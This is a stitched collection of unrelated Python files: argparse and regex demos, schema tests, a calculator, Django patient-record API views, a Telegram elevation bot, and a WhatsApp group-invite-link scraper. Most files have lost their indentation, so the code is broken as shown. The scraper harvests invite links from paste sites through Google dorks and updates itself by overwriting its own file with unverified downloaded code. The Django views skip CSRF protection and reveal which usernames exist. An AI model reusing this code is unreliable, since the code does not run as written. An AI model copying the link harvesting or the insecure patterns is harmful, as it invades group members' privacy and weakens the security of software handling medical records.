from .pycgminer import CgminerAPI
|
# ArgumentParser objects allow the help formatting to be customized by specifying an alternate formatting class. Currently,
# there are four such classes:
import argparse
import textwrap
"""
RawTextHelpFormatter maintains whitespace for all sorts of help text,
including argument descriptions. However, multiple new lines are replaced with one.
If you wish to preserve multiple blank lines, add spaces between the newlines.
"""
parser = argparse.ArgumentParser(
prog="PROG",
description=textwrap.dedent('''\
Please do not mess up this text!
--------------------------------
I have indented it
exactly the way
I want it
'''),
    epilog='''likewise for this epilog, whose whitespace and
        line breaks are preserved exactly as written,
        because RawTextHelpFormatter is in use
    ''',
usage='%(prog)s [options]',
formatter_class=argparse.RawTextHelpFormatter
)
parser.print_help()
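# A minimal extra sketch (assumption, not part of the original snippet):
# ArgumentDefaultsHelpFormatter, another of the four formatter classes, appends
# each argument's default value to its help text automatically.
defaults_parser = argparse.ArgumentParser(
    prog="PROG",
    formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
defaults_parser.add_argument("--retries", type=int, default=3, help="number of retries")
defaults_parser.print_help()  # the --retries help line ends with "(default: 3)"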
|
# Nacar
# Copyright 2022 Alberto Morón Hernández
# [github.com/albertomh/Nacar]
#
# Test the Schema module
# ▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔
# Test adding subschemas to the registry, setting missing optional attributes,
# schema property getters, and raising custom InvalidSchemaErrors.
import pytest
from cerberus import schema_registry
from nacar.schema import Schema, InvalidSchemaError
from tests.utils import get_nested_key
@pytest.fixture()
def blueprint() -> dict:
return {
'title': 'Test Blueprint',
'meta': {
'authors': [
'Author Lastname'
]
},
'screens': [
{
'name': 'home',
'options': [{'name': 'Develop', 'link': 'develop'}, {'name': 'Test', 'link': 'test'}] # noqa
},
{
'name': 'develop',
'options': [{'name': 'build', 'action': "echo 'build code'"}]
},
{
'name': 'test',
'options': [{'name': 'run', 'action': "echo 'run tests'"}]
}
]
}
def cerberus_registry_contains_expected_subschemas(registry) -> bool:
schemas_in_registry_count = len(registry.all().keys())
expected_subschema_names = sorted([
'meta',
'screen',
'screen__option--link',
'screen__option--action'
])
actual_subschema_keys = sorted(registry.all().keys())
return (schemas_in_registry_count == len(expected_subschema_names)
and (expected_subschema_names == actual_subschema_keys))
def test_instantiating_schema_adds_subschemas_to_cerberus() -> None:
schema_registry.clear()
Schema()
assert cerberus_registry_contains_expected_subschemas(schema_registry) is True # noqa
def test_add_blueprint_subschemas_to_registry():
schema_registry.clear()
Schema.add_blueprint_subschemas_to_registry()
assert cerberus_registry_contains_expected_subschemas(schema_registry) is True # noqa
@pytest.mark.parametrize('path_chain,default_value', [
(['meta', 'width'], 80),
(['meta', 'show_made_with_on_exit'], True),
])
def test_set_missing_optional_attributes__meta_width(
blueprint: dict,
path_chain: list,
default_value
) -> None:
assert get_nested_key(blueprint, path_chain) is None
blueprint = Schema.set_missing_optional_attributes(blueprint)
assert get_nested_key(blueprint, path_chain) == default_value
def test_get_screen_names(blueprint: dict):
screen_names = Schema.get_screen_names(blueprint)
expected_screen_names = ['home', 'develop', 'test']
assert screen_names == expected_screen_names
def test_get_screen_links(blueprint: dict):
screen_links = Schema.get_screen_links(blueprint)
expected_screen_links = [['home', 'develop'], ['home', 'test']]
assert screen_links == expected_screen_links
def test_get_max_screen_options_in_blueprint(blueprint: dict):
expected_max_screen_options = 2
max_screen_options = Schema.get_max_screen_options_in_blueprint(blueprint) # noqa
assert max_screen_options == expected_max_screen_options
@pytest.mark.parametrize('screen_name,expected_options', [
('home', [{'name': 'Develop', 'link': 'develop'}, {'name': 'Test', 'link': 'test'}]), # noqa
('develop', [{'name': 'build', 'action': "echo 'build code'"}]),
('test', [{'name': 'run', 'action': "echo 'run tests'"}]),
])
def test_get_options_for_screen(
blueprint: dict,
screen_name: str,
expected_options: list
) -> None:
options_for_screen = Schema.get_options_for_screen(blueprint, screen_name) # noqa
assert options_for_screen == expected_options
@pytest.mark.parametrize('validator_errors,err_message', [
({'meta': [{'width': ['min value is 40']}]},
"Please amend these schema errors in your blueprint:\nmeta.width: Min value is 40."), # noqa
({'meta': [{'show_made_with_on_exit': ['must be of boolean type']}], 'screens': ['Screens must not link to themselves.']}, # noqa
"Please amend these schema errors in your blueprint:\nmeta.show_made_with_on_exit: Must be of boolean type.\nscreens: Screens must not link to themselves."), # noqa
])
def test_invalid_schema_error(validator_errors: dict, err_message: str):
with pytest.raises(InvalidSchemaError) as excinfo:
raise InvalidSchemaError(validator_errors)
err: InvalidSchemaError = excinfo.value
assert err.message == err_message
|
import re
import argparse
from typing import Optional, List
from dataclasses import dataclass
from lark import Lark, Transformer, v_args
USAGE = "A command line calculator"
@dataclass
class Token:
name: str
value: str
calc_grammar = """
?start: sum
| NAME "=" sum -> assign_var
?sum: product
| sum "+" product -> add
| sum "-" product -> sub
?product: atom
| product "*" atom -> mul
| product "/" atom -> div
?atom: NUMBER -> number
| "-" atom -> neg
| NAME -> var
| "(" sum ")"
%import common.CNAME -> NAME
%import common.NUMBER
%import common.WS_INLINE
%ignore WS_INLINE
"""
@v_args(inline=True) # Affects the signatures of the methods
class CalculateTree(Transformer):
from operator import add, sub, mul, truediv as div, neg
number = float
def __init__(self):
self.vars = {}
def assign_var(self, name, value):
self.vars[name] = value
return value
def var(self, name):
try:
return self.vars[name]
except KeyError:
raise Exception("Variable not found: %s" % name)
def calculate(formula):
calc_parser = Lark(calc_grammar, parser='lalr',
transformer=CalculateTree())
result = calc_parser.parse(formula)
return result
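# A minimal sketch (assumption, not part of the original CLI) of calling
# calculate() directly; each call builds a fresh parser and transformer, so
# variables assigned in one formula are not visible to the next call.
def demo_calculate():  # hypothetical helper, for illustration only
    assert calculate("1 + 2*3") == 7.0
    assert calculate("x = -(4/2)") == -2.0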
def main():
parser = argparse.ArgumentParser("calc")
parser.add_argument("formula", action="store")
args = parser.parse_args()
formula = args.formula
result = calculate(formula)
if result is not None:
print(result)
if __name__ == '__main__':
main()
|
import abc
from abc import ABC
class Parent(ABC):
    # __metaclass__ = abc.ABCMeta  # this appears to be necessary only in Python <= 3.4
def __init__(self):
print("__init__: Parent")
def do_template(self):
print("template method leads to {}".format(self.template_method()))
@abc.abstractmethod
def template_method(self):
"""This should not be subclassed if not over riden if ABC is doing its work"""
return
class ClassA(Parent):
def __init__(self):
# super(ClassA, self).__init__()
super().__init__() # super() is simpler in Python 3
def template_method(self):
return "ClassA.template_method"
class ClassB(Parent):
def __init__(self):
# super(ClassB, self).__init__()
super().__init__() # super() is simpler in Python 3
def template_method(self):
return "ClassB.template_method"
class DoesNotInstantiateThanksToABC(Parent):
def __init__(self):
print("DoesNotInstantiateThanksToABC: __init__")
# super(DoesNotInstantiateThanksToABC, self).__init__()
super().__init__() # super() is simpler in Python 3
if __name__ == "__main__":
a = ClassA()
a.do_template()
b = ClassB()
b.do_template()
    parent = Parent()  # raises TypeError: can't instantiate abstract class Parent
parent.do_template()
parent.template_method()
fails = DoesNotInstantiateThanksToABC()
|
import json
import re
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from django.contrib.auth import authenticate, login
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.models import User
from django.db import IntegrityError
from sample.forms import NewPatientForm, NewCaseForm
from sample.models import Patient
from django.utils.importlib import import_module
from django.contrib.auth import get_user
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.contrib.auth import SESSION_KEY, BACKEND_SESSION_KEY, load_backend
from sample.models import Case, Comment, CommentGroup, Scan
from django.utils import timezone
from base64 import b64decode
from django.core.files.base import ContentFile
from django.db.models import Q
@csrf_exempt
def process_login(request):
json_data = json.loads(request.raw_post_data)
try:
username = json_data['username']
password = json_data['password']
except KeyError:
json_response = json.dumps({"success": "false",
"type": "badRequest"})
return HttpResponse(json_response, mimetype='application/json')
try:
User.objects.get(username=username)
except ObjectDoesNotExist:
json_response = json.dumps({"success": "false",
"type": "invalidUser"})
return HttpResponse(json_response, mimetype='application/json')
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
try:
login(request, user)
json_response = json.dumps({"success": "true",
"type": "worker",
"sessionid":
request.session.session_key})
return HttpResponse(json_response, mimetype='application/json')
except ObjectDoesNotExist:
json_response = json.dumps({"success": "false",
"type": "existence"})
return HttpResponse(json_response, mimetype='application/json')
else:
json_response = json.dumps({"success": "false", "type": "active"})
return HttpResponse(json_response, mimetype='application/json')
else:
# bad password
json_response = json.dumps({"success": "false", "type": "password"})
return HttpResponse(json_response, mimetype='application/json')
def is_worker(request):
json_data = json.loads(request.raw_post_data, strict=False)
engine = import_module(settings.SESSION_ENGINE)
try:
session = engine.SessionStore(json_data['session_key'])
except KeyError:
json_response = json.dumps({"success": "false",
"type": "badRequest"})
return HttpResponse(json_response, mimetype='application/json')
try:
worker = session[SESSION_KEY]
sample_path = session[BACKEND_SESSION_KEY]
sample = load_backend(sample_path)
user = sample.get_user(worker) or AnonymousUser()
except KeyError:
user = AnonymousUser()
if user.is_authenticated():
try:
if user.worker:
json_data['worker'] = user.worker
return json_data
except:
return False
@csrf_exempt
def create_new_patient_m(request):
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
form = NewPatientForm(data)
if form.is_valid():
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
gps_coordinates = form.cleaned_data['gps_coordinates']
address = form.cleaned_data['address']
date_of_birth = form.cleaned_data['date_of_birth']
phone_number = form.cleaned_data['phone_number']
health_id = form.cleaned_data['health_id']
photo_link = form.cleaned_data['photo_link']
sex = form.cleaned_data['sex']
email = form.cleaned_data['email']
try:
patient = Patient(
first_name=first_name,
last_name=last_name,
gps_coordinates=gps_coordinates,
address=address,
date_of_birth=date_of_birth,
phone=phone_number,
health_id=health_id,
gender=sex,
email=email,
photo_link=photo_link)
patient.save()
except IntegrityError:
json_response = json.dumps({"success": "false",
"type": "IntegrityError"})
return HttpResponse(json_response, mimetype='application/json')
json_response = json.dumps({"success": "true",
"type": "newPatient", "patient_id":
str(patient.id)})
return HttpResponse(json_response, mimetype='application/json')
else:
json_response = json.dumps({"success": "false",
"type": "invalidForm"})
return HttpResponse(json_response, mimetype='application/json')
@csrf_exempt
def display_patient_m(request):
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
try:
patient = Patient.objects.filter(id=data['patient_id'])[0]
except KeyError:
json_response = json.dumps({"success": "false",
"type": "KeyError"})
return HttpResponse(json_response, mimetype='application/json')
date_of_birth = patient.date_of_birth
if date_of_birth is None:
date_of_birth = ""
json_response = json.dumps({
'photo_link': patient.photo_link,
'firstName': patient.first_name,
'lastName': patient.last_name,
'patient_id': patient.id,
'gender': patient.gender,
'date_of_birth': date_of_birth.strftime('%Y-%m-%d'),
'gps_coordinates': patient.gps_coordinates,
'health_id': patient.health_id,
'address': patient.address,
'phone': patient.phone,
'email': patient.email})
return HttpResponse(json_response, mimetype='application/json')
@csrf_exempt
def create_new_case_m(request):
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
form = NewCaseForm(data)
worker = data['worker']
if form.is_valid():
patient_id = form.cleaned_data['patient']
comments = form.cleaned_data['comments']
priority = form.cleaned_data['priority']
try:
patient = Patient.objects.filter(id=patient_id)[0]
comment = Comment(
author=worker.user,
text=comments,
time_posted=timezone.now())
comment.save()
comment_group = CommentGroup()
comment_group.save()
comment_group.comments.add(comment)
case = Case(
patient=patient,
submitter_comments=comment_group,
priority=priority,
status=1,
submitter=worker,
date_opened=timezone.now())
case.save()
except IntegrityError:
json_response = json.dumps({"success": "false",
"type": "IntegrityError"})
return HttpResponse(json_response, mimetype='application/json')
json_response = json.dumps({"success": "true",
"type": "newCase",
"case_id": str(case.id)})
return HttpResponse(json_response, mimetype='application/json')
else:
json_response = json.dumps({"success": "false",
"type": "invalidForm"})
return HttpResponse(json_response, mimetype='application/json')
@csrf_exempt
def display_case_m(request):
''' Displays the specified case. '''
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
try:
case = Case.objects.filter(id=data['case_id'])[0]
except KeyError:
json_response = json.dumps({"success": "false",
"type": "KeyError"})
return HttpResponse(json_response, mimetype='application/json')
json_response = json.dumps({"success": "true",
"type": "newCase",
'firstName': str(case.patient.first_name),
'lastName': str(case.patient.last_name),
'patient_id': str(case.patient.id),
'gender': str(case.patient.gender),
'date_of_birth':
str(case.patient.date_of_birth),
'health_id': str(case.patient.health_id),
'priority': str(case.priority)})
return HttpResponse(json_response, mimetype='application/json')
@csrf_exempt
def upload_image_m(request):
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
try:
case = Case.objects.filter(id=data['case_id'])[0]
except KeyError:
json_response = json.dumps({"success": "false",
"type": "KeyError"})
return HttpResponse(json_response, mimetype='application/json')
try:
scan = Scan(
patient=case.patient)
scan.save()
except IntegrityError:
scan.delete()
json_response = json.dumps({"success": "false",
"type": "IntegrityError"})
return HttpResponse(json_response, mimetype='application/json')
try:
image_data = b64decode(data['image_string'])
scan.file = ContentFile(image_data, "test.png")
scan.save()
#comment.scans.add(scan)
case.scans.add(scan)
#case.scan = scan
#case.save()
except IntegrityError:
json_response = json.dumps({"success": "false",
"type": "IntegrityError"})
return HttpResponse(json_response, mimetype='application/json')
json_response = json.dumps({"success": "true",
"type": "uploadSuccess"})
return HttpResponse(json_response, mimetype='application/json')
@csrf_exempt
def display_patient_cases_m(request):
''' Displays all cases related to a patient. '''
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
try:
patient = Patient.objects.filter(id=data['patient_id'])[0]
cases = Case.objects.filter(patient=patient)
except KeyError:
json_response = json.dumps({"success": "false",
"type": "KeyError"})
return HttpResponse(json_response, mimetype='application/json')
json_response = json.dumps({"success": "true",
"type": "patientCases",
"cases": create_cases_json(cases)})
return HttpResponse(json_response, mimetype='application/json')
def create_cases_json(case_objects):
case = {}
cases = []
for case_object in case_objects:
case['firstName'] = str(case_object.patient.first_name)
case['lastName'] = str(case_object.patient.last_name)
case['patient_id'] = str(case_object.patient.id)
case['gender'] = str(case_object.patient.gender)
case['date_of_birth'] = str(case_object.patient.date_of_birth)
case['health_id'] = str(case_object.patient.health_id)
if str(case_object.priority) == "10":
case['priority'] = "High"
elif str(case_object.priority) == "20":
case['priority'] = "Medium"
elif str(case_object.priority) == "30":
case['priority'] = "Low"
case['case_id'] = str(case_object.id)
case['submitter'] = str(case_object.submitter)
case['creation_date'] = str(case_object.date_opened)
cases.append(case)
case = {}
return cases
# Thanks to http://julienphalip.com/post/2825034077/adding-search-to-a-django-site-in-a-snap
def normalize_query(query_string,
findterms=re.compile(r'"([^"]+)"|(\S+)').findall,
normspace=re.compile(r'\s{2,}').sub):
    ''' Splits the query string into individual keywords, getting rid of unnecessary
    spaces and grouping quoted words together.
Example:
>>> normalize_query(' some random words "with quotes " and
spaces')
['some', 'random', 'words', 'with quotes', 'and', 'spaces']
'''
return [normspace(' ', (t[0] or t[1]).strip()) for t in
findterms(query_string)]
def get_query(query_string, search_fields):
''' Returns a query, that is a combination of Q objects. That combination
aims to search keywords within a model by testing the given search
fields.
'''
query = None # Query to search for every search term
terms = normalize_query(query_string)
for term in terms:
or_query = None # Query to search for a given term in each field
for field_name in search_fields:
q = Q(**{"%s__icontains" % field_name: term})
if or_query is None:
or_query = q
else:
or_query = or_query | q
if query is None:
query = or_query
else:
query = query & or_query
return query
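# A small worked sketch (assumption, not part of the original views): for
# query_string 'john doe' and search_fields ['first_name', 'last_name'],
# get_query builds roughly
#   (Q(first_name__icontains='john') | Q(last_name__icontains='john'))
#   & (Q(first_name__icontains='doe') | Q(last_name__icontains='doe'))
# i.e. every term must match at least one of the fields.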
@csrf_exempt
def search_patients(request):
query_string = ''
found_entries = None
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
if ('q' in data) and data['q'].strip():
query_string = data['q']
entry_query = get_query(query_string, ['first_name', 'last_name',
'health_id',])
found_entries = Patient.objects.filter(entry_query)
    if found_entries:
json_response = json.dumps({"success": "true",
"type": "search",
"result": create_patients_json(found_entries)})
return HttpResponse(json_response, mimetype='application/json')
else:
json_response = json.dumps({"success": "false",
"type": "search",
"result": "No result found"})
return HttpResponse(json_response, mimetype='application/json')
def create_patients_json(patient_objects):
patient = {}
patients = []
for patient_object in patient_objects:
patient['firstName'] = str(patient_object.first_name)
patient['lastName'] = str(patient_object.last_name)
patient['patient_id'] = str(patient_object.id)
patient['gender'] = str(patient_object.gender)
patient['date_of_birth'] = str(patient_object.date_of_birth)
patient['health_id'] = str(patient_object.health_id)
patient['email'] = str(patient_object.email)
patient['gps'] = str(patient_object.gps_coordinates)
patient['address'] = str(patient_object.address)
patient['phone'] = str(patient_object.phone)
patients.append(patient)
patient = {}
return patients
|
"""Builds elevation graph between one or more points.
Module searches route between two coordinate points, draws a
elevation graph and constructs a summary. Route and elevation are fetched
using Google Maps APIs. Graph is created from fetched elevation points and
drawn with Matplotlib.
Usage:
Find elevation from Helsinki - Turku - Tampere
/ele helsinki; turku; tampere
/ele
Helsinki
via
Turku
tampere
You can replace any or all cities with location
"""
import json
import matplotlib
# yapf: disable
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from geopy.geocoders import GoogleV3, Nominatim
from PIL import Image
from telegram import ChatAction, Location, ParseMode
try:
# For Python 3.0 and later
from urllib.request import urlopen
from urllib.parse import urlencode
from configparser import ConfigParser
except ImportError:
# Fall back to Python 2's urllib
from urllib import urlopen
from urllib import urlencode
from ConfigParser import ConfigParser
# yapf: enable
config = ConfigParser()
config.read('telepybot.conf')
api_key = config.get('elevation', 'gmapsApiKey')
def handle_update(bot, update, update_queue, **kwargs):
"""Process message from update and send elevation infromation.
This is the main function that modulehander calls.
Args:
bot (telegram.Bot): Telegram bot itself
update (telegram.Update): Update that will be processed
update_queue (Queue): Queue containing all incoming and unhandled updates
kwargs: All unused keyword arguments. See more from python-telegram-bot
"""
chat_id = update.message.chat_id
origin = None
destination = None
via_locs = []
try:
query = update.message.text.split(' ', 1)[1]
origin = query
try:
# TODO: Add possibility to add 'via' by chaining locations with ';'
locs = query.split(';')
origin = locs[0]
if len(locs) > 1:
destination = locs[-1].strip()
via_locs = locs[1:-1]
via_locs = [x.strip() for x in via_locs]
except ValueError:
pass
except IndexError:
pass
next_is_via = False
while not origin or not destination:
text = ('Send location or place name')
bot.sendMessage(chat_id=chat_id, text=text)
update = update_queue.get()
if update.message.location:
location = update.message.location
elif update.message.text != '':
if update.message.text.startswith('/'):
update_queue.put(update)
return
if update.message.text.lower().strip() == 'via':
bot.sendMessage(chat_id=chat_id, text='Send via location')
next_is_via = True
continue
geolocator = GoogleV3(api_key=api_key)
location = geolocator.geocode(update.message.text)
if next_is_via:
next_is_via = False
if not origin:
text = "Via can't be before origin. Quitting"
bot.sendMessage(chat_id=chat_id, text=text)
return
via_locs.append('{},{}'.format(location.latitude,
location.longitude))
elif origin:
destination = '{},{}'.format(location.latitude, location.longitude)
else:
origin = '{},{}'.format(location.latitude, location.longitude)
bot.sendChatAction(chat_id, action=ChatAction.TYPING)
report, graph = elevate(origin, destination, via_locs, 'best')
bot.sendMessage(chat_id, report, parse_mode=ParseMode.MARKDOWN)
# bot.sendMessage(chat_id, 'If you want graph, type "graph"')
with open(graph, 'rb') as photo:
bot.sendChatAction(chat_id, action=ChatAction.UPLOAD_PHOTO)
bot.sendPhoto(chat_id, photo)
def elevate(origin, destination, via_locs, plot_mode):
"""Get elevation data from Google Maps Elevation api and construct a report
Receives origin, destination and possibly intermediate location points,
finds a route using Google Maps Directions API. Gets altitude points for
that route from Google Maps Elevation API. Calculates a few statistics and
sends them to user along with a graph showing altitude along the route.
Args:
origin (str): Origin coordinates, e.g. "60.161928,24.951688"
destination (str): Destination coordinates, e.g. "61.504956,23.743120"
via_locs (list): Additional intermediate coordinates
plot_mode (str): Preset mode for graph
"""
params = {'origin': origin.encode('utf8'),
'destination': destination.encode('utf8'),
'waypoints': '|'.join('via:' + str(x) for x in via_locs),
'key': api_key,
'mode': 'bicycling',
'avoid': 'highways'}
cycling = True
url_params = urlencode(params)
url = 'https://maps.googleapis.com/maps/api/directions/json?' + url_params
cycle_route = urlopen(url).read().decode('utf-8')
route_json = json.loads(cycle_route)
# Since some countries don't have cycling routes, fall back to walking
if route_json['status'] != "OK":
# Change cycling to walking
params['mode'] = 'walking'
cycling = False
url_params = urlencode(params)
url = 'https://maps.googleapis.com/maps/api/directions/json?' + url_params
walking_route = urlopen(url).read().decode('utf-8')
route_json = json.loads(walking_route)
if route_json['status'] != "OK":
return "Could not find a route between the locations", None
encoded_polyline = route_json['routes'][0]['overview_polyline']['points']
distance = route_json['routes'][0]['legs'][0]['distance']['value'] / float(
1000)
params = {'path': 'enc:' + encoded_polyline,
'samples': 128,
'key': api_key}
url_params = urlencode(params)
url = 'https://maps.googleapis.com/maps/api/elevation/json?' + url_params
elevation_data = urlopen(url).read().decode('utf-8')
elevation_json = json.loads(elevation_data)
elevation_points = []
closest_to_via_locs = []
for point in elevation_json['results']:
elevation_points.append(point['elevation'])
filename = build_plot(distance, elevation_points, plot_mode)
# Choose correct mode for Google Maps link
if cycling:
mode = '1'
else:
# walking
mode = '2'
# Construct Google Maps link
gmaps = 'https://www.google.com/maps/dir/%s/%s/%s/data=!4m2!4m1!3e%s' % (
origin, '/'.join(str(x) for x in via_locs), destination, mode)
# Calculate total ascent and descent
ascent, descent = calculate_route_stats(elevation_points)
report = ("From %s to %s\nDistance: %s km\nTotal ascent: %sm\n"
"Total descent: %sm\n[Gmaps route link](%s)" %
(origin, destination, "%.2f" % round(distance, 2), str(ascent),
str(descent), gmaps))
return report, filename
def build_plot(distance, elevation_points, plot_mode):
"""Build the elevation graph using matplotlib."""
if plot_mode == 'tall':
custom_dpi = 75
size = (600 / custom_dpi, 200 / custom_dpi)
convert_to_jpg = True
elif plot_mode == 'best':
custom_dpi = None
size = None
convert_to_jpg = False
else:
custom_dpi = 75
size = (600 / custom_dpi, 200 / custom_dpi)
convert_to_jpg = True
plt.style.use('seaborn-darkgrid')
# plt.style.use('ggplot')
fig = plt.figure(figsize=size, dpi=custom_dpi)
ax = fig.add_subplot(111)
plt.ylabel('Elevation (m)')
plt.xlabel('Distance (km)')
x = np.linspace(0, distance, len(elevation_points))
y = elevation_points
ax.plot(x, y)
plt.tight_layout()
fig.savefig('.tmp/latest_elevation.png', dpi=custom_dpi)
# Close plt window, figure and axis
plt.close()
if convert_to_jpg:
Image.open('.tmp/latest_elevation.png').save(
'.tmp/latest_elevation.jpg', 'JPEG')
return '.tmp/latest_elevation.jpg'
else:
return '.tmp/latest_elevation.png'
def calculate_route_stats(elevation_points):
"""Calculate few statistics from elevation points."""
total_ascent = 0
total_descent = 0
curr = elevation_points[0]
for point in elevation_points:
if point > curr:
total_ascent += point - curr
else:
total_descent += curr - point
curr = point
return int(total_ascent), int(total_descent)
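# A small worked example (assumption, not part of the original module): for the
# points [10, 15, 12, 20] the route climbs 5 + 8 = 13 m and drops 15 - 12 = 3 m,
# so calculate_route_stats([10, 15, 12, 20]) returns (13, 3).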
def parse_location(loc, destination=None):
"""Convert location to string, e.g. "60.161928,24.951688".
"""
if isinstance(loc, Location):
return str(loc.latitude) + ',' + str(loc.longitude)
elif destination:
return str(loc) + ',' + str(destination)
|
import time
import sys
import re,os
import urllib.request,urllib.parse,threading
from datetime import datetime
try:
from googlesearch import search
except ImportError:
print("[!] \"google\" Module is unavailable. ")
print(" Please Install it by using:")
print("\n python3 -m pip install google")
exit()
SAVE = "Result_%s.txt" % datetime.now().strftime('%Y_%m_%d-%H_%M_%S')
availabledom = ["pastebin",
"throwbin",
"pastr",
"pasteio",
"paste2",
"paste"]
site_urls = ["https://whatsgrouplink.com/",
"https://whatsappgroups.app/job-alerts-whatsapp-group-links/",
"https://whatsappgroups.app/whatsapp-group-links/",
"https://whatsappgroups.app/pubg-whatsapp-group-links-india/",
"https://whatsappgroups.app/funny-jokes-whatsapp-group-links/",
"https://allinonetrickz.com/new-whatsapp-groups-invite-links/"]
def linkcheck(url):
print("\nTrying URL:", url, end='\r')
try:
r = urllib.request.urlopen(url)
except:
return ('','')
if(r.getcode() != 404):
r = r.read().decode("utf-8")
p = r.find("</h2>")
name=r[r.rfind("\">", 0, p) + 2:p]
if name.strip() == '':
return ('','')
return (name,url)
return ('','')
def pad(s):
    """Insert '/invite' after the domain if the WhatsApp link does not already contain it."""
    if "invite" not in s:
        p = s.find(".com")
        s = s[:p + 4] + "/invite" + s[p + 4:]
    return s
def scrape(txt):
if type(txt) == type(b''):
txt = txt.decode("utf-8")
match = []
match2 = re.findall(r"(https:\/\/chat\.whatsapp\.com\/(invite\/)?[a-zA-Z0-9]{22})", txt)
match = [item[0] for item in match2]
match = list(set(match))
for lmt in match:
lmt = pad(lmt)
nm, url = linkcheck(lmt)
if nm != '':
print("[i] Group Name: " + (nm + ' ' * (65-len(nm))))
print("[i] Group Link: ", url)
f = open(SAVE, "ab")
f.write(str.encode(nm + " : " + url + '\n'))
f.close()
def start(index):
print("[*] Initializing...")
if index >= len(availabledom):
return
query = "intext:chat.whatsapp.com inurl:" + availabledom[index]
print("[*] Finding Results from Google ...")
for url in search(query, tld="com", num=10, stop=None, pause=2):
txt = urllib.request.urlopen(url).read().decode("utf8")
scrape(txt)
def scrap_from_link(index):
print("[*] Initializing...")
if index >= len(site_urls):
return
r = urllib.request.urlopen(site_urls[index]).read().decode()
scrape(r)
def get_terminal_size(fallback=(80, 24)):
for i in range(0, 3):
try:
columns, rows = os.get_terminal_size(i)
except OSError:
continue
break
else:
columns, rows = fallback
return columns, rows
def main():
global SAVE
terminal_size = get_terminal_size()
if terminal_size[0] < 80:
print("""
__ __ __ __
/ _` |__) / \ | | |__) | \ /
\__> | \ \__/ \__/ | |___ |
""")
else:
print("""
________ ____ __ _____ ____ __
/ ___/ _ \/ __ \/ / / / _ \/ /\ \/ /
/ (_ / , _/ /_/ / /_/ / ___/ /__\ /
\___/_/|_|\____/\____/_/ /____//_/
""")
if len(sys.argv) >= 2:
if 'u' in sys.argv[1] or '-u' in sys.argv[1]:
print("[*] Updating, Please Wait...", end='\r')
try:
txt = urllib.request.urlopen("https://github.com/Lucia361/grouply/raw/master/grouply.py").read()
f = open(sys.argv[0], "wb")
f.write(txt)
f.close()
print("[$] Update Successful.")
print("[i] Run " + sys.argv[0] + " Again..")
except:
print("[!] Update Failed !!! ")
exit()
threads = []
print("""
1> Extract From Google
2> Extract From Group Sharing Sites [BEST]
3> Check From File
4> Update Grouply
""")
try:
inp = int(input("[#] Enter Selection: "))
except:
print("\t[!] Invalid Selection..")
exit()
if inp != 4:
newSave = str(input("[#] Enter Saving File (Default is Result.txt): "))
SAVE = "Result.txt" if newSave == '' else newSave
f = open(SAVE, 'w')
f.write("WhatsApp Group Links Extracted by Grouply \nGet it at https://github.com/Lucia361/grouply\r\n")
f.close()
if inp == 1:
for i in range(0, int(input("[#] Enter Threads Number(1-" + str(len(availabledom)) + "):- "))):
thread = threading.Thread(target=start, args=(i,))
thread.start()
threads.append(thread)
for i in threads:
i.join()
elif inp == 2:
for i in range(0, int(input("[#] Enter Threads Number(1-" + str(len(site_urls)) + "):- "))):
thread = threading.Thread(target=scrap_from_link, args=(i,))
thread.start()
threads.append(thread)
for i in threads:
i.join()
elif inp == 3:
path = input("[#] Enter Whatsapp Links File Path: ").strip()
if not os.path.isfile(path):
print("\t[!] No such file found...")
exit()
thn = int(input("[#] Enter Thread Numbers: "))
op = open(path, "rb").read().decode("utf-8")
op = op.count('\n') // thn
with open(path, "rb") as strm:
for i in range(thn - 1):
head = [next(strm) for x in range(op)]
thread = threading.Thread(target=scrape, args=(b'\n'.join(head),))
thread.start()
threads.append(thread)
thread = threading.Thread(target=scrape, args=(strm.read(),))
thread.start()
threads.append(thread)
for i in threads:
i.join()
elif inp == 4:
print("[*] Updating, Please Wait...", end='\r')
try:
txt = urllib.request.urlopen("https://github.com/Lucia361/grouply/raw/master/grouply.py").read()
f = open(sys.argv[0], "wb")
f.write(txt)
f.close()
print("[$] Grouply updated successfully")
print("[i] Run " + sys.argv[0] + " Again...")
except:
print("[!] Update Failed !!! ")
exit()
else:
print("[!] Invalid Selection...")
if __name__ == "__main__":
main()
|
import re
haystack = "Hello world"
needle = 'ello'
mo = re.search(needle, haystack)
print(mo)
# Does not work on python 3.6:
# assert isinstance(mo, re.Match)
assert mo.start() == 1
assert mo.end() == 5
assert re.escape('python.exe') == 'python\\.exe'
p = re.compile('ab')
s = p.sub('x', 'abcabca')
print(s)
assert s == 'xcxca'
idpattern = r'([_a-z][_a-z0-9]*)'
mo = re.search(idpattern, '7382 _boe0+2')
print(mo)
# The first match starts at the underscore because digits do not match [_a-z]:
assert mo.group(0) == '_boe0'
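# A small additional sketch (assumption, not part of the original snippet):
# findall with this single-group pattern returns the captured identifiers,
# which makes the behaviour easier to see than a single search.
assert re.findall(idpattern, '7382 _boe0+2') == ['_boe0']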
|
from rest_framework.routers import DefaultRouter
from tasks.viewsets import UsersViewSet, TasksViewSet
router=DefaultRouter()
router.register(r'users', UsersViewSet, basename='users')
router.register(r'tasks', TasksViewSet, basename='tasks')
urlpatterns=router.urls
|
# a116_buggy_image.py
import turtle as trtl
# instead of a descriptive name of the turtle such as painter,
# a less useful variable name spider is used
spider= trtl.Turtle()
spider.pensize(40)
